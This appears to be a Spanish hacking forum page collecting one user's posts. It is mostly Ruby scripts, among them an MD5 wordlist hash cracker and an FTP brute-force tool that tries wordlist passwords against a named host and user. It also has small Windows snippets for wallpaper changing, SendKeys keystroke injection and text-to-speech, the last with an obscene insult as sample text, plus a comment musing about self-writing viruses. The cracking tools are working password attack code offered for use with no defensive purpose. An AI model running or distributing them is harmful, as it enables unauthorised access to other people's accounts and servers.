me referia al uso que se le pueda dar , por ejemplo hacer que los programas se manejen y escriban solos como lo hace la instalacion de XP coloso , o se podria hacer un virus que escriba solo y esas cosas , a eso me referia.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes MenúCita de: skapunky en 11 Febrero 2012, 00:09 AM
Es marketing claramente...es una aplicación...para que programar una aplicación entera pudiendo enviarle una postal hecha por ejemplo con photoshop? Nadie aprende a hacer eso en 2 meses.
#!usr/bin/ruby
#CrackHash 0.1
#Coded By Doddy H
#Test with 202cb962ac59075b964b07152d234b70 = 123
require "digest/md5"
def openwords(file)
if File.file?(file)
print "\n[+] Opening file\n\n"
ar = File.open(file)
lineas = ar.readlines
ar.close
print "[+] Number of words : ",lineas.length,"\n\n"
return lineas
else
print "[-] Error opening file\n"
end
end
def sintax()
print "\n[+] ruby crack.rb <hash> <wordlist>\n"
end
def head()
print "\n-- == CrackHash 0.1 == --\n\n"
end
def copyright()
print "\n\n(C) Doddy Hackman 2012\n"
exit(1)
end
hash = ARGV[0]
wordlist = ARGV[1]
head()
if !hash and !wordlist
sintax()
else
if hash.length ==32
words = openwords(wordlist)
print "\n[+] Cracking hash...\n\n"
words.each do |word|
word = word.chomp
if Digest::MD5.hexdigest(word) == hash
print "\a\a\n[+] Hash cracked : ",word,"\n"
copyright()
end
end
print "\n[-] Hash not found\n\n"
else
print "\n[-] Hash invalid\n\n"
copyright()
end
end
copyright()
# The End ?
#!usr/bin/ruby
#FTP Crack 0.1
#Coded By Doddy H
require "net/ftp"
def openwords(file)
if File.file?(file)
print "\n[+] Opening file\n\n"
ar = File.open(file)
lineas = ar.readlines
ar.close
print "[+] Number of words : ",lineas.length,"\n\n"
return lineas
else
print "[-] Error opening file\n"
end
end
def sintax()
print "\n[+] ruby ftpcrack.rb <host> <user> <wordlist>\n"
end
def head()
print "\n-- == FTP Crack 0.1 == --\n\n"
end
def copyright()
print "\n\n(C) Doddy Hackman 2012\n"
exit(1)
end
host = ARGV[0]
user = ARGV[1]
wordlist = ARGV[2]
head()
if !host and !user and !wordlist
sintax()
else
words = openwords(wordlist)
print "\n[+] Cracking ...\n\n"
words.each do |word|
word = word.chomp
begin
ftp =Net::FTP.new(host,user,word)
rescue Net::FTPPermError
else
print "\a\a\n[+] Password Cracked : ",word,"\n"
copyright()
end
end
print "\n[-] Pass not found\n"
end
copyright()
# The End ?
#!usr/bin/ruby
#Funcion cambiarfondo()
#Based on a code of protos
require "Win32API"
def cambiarfondo(imagen)
fondo = Win32API.new("user32", "SystemParametersInfo", ['L', 'L', 'P', 'L'], 'L')
fondo.Call(20, 0, imagen, 0)
end
cambiarfondo("fondo/test.jpg");
#The End ?
#!usr/bin/ruby
#Funcion openwords()
#Coded By Doddy H
def openwords(file)
if File.file?(file)
print "[+] Opening file\n\n"
ar = File.open(file)
lineas = ar.readlines
ar.close
print "[+] Number of words : ",lineas.length,"\n\n"
return lineas
else
print "[-] Error opening file\n"
end
end
words = openwords("test.txt")
words.each do |word|
word = word.chomp
print "[+] Word : ",word
end
#The End ?
#!usr/bin/ruby
#Funcion savefile()
#Coded By Doddy H
def savefile(file,text)
save = File.open(file, "a")
save.puts text+"\n"
save.close
end
savefile("test.txt","probando")
#The End ?
#!usr/bin/ruby
#Funcion send()
#Coded By Doddy H
require "win32ole"
def send(decir)
test = WIN32OLE.new('Wscript.Shell')
test.SendKeys(decir)
end
send("no tengas miedo.....")
# The End ?
#!usr/bin/ruby
#Funcion speak()
#Coded by Doddy H
require "win32ole"
def speak(text)
test = WIN32OLE.new("SAPI.Spvoice")
test.Speak(text)
end
speak("Hi stupid ,i like fuck your mother")
#The End ?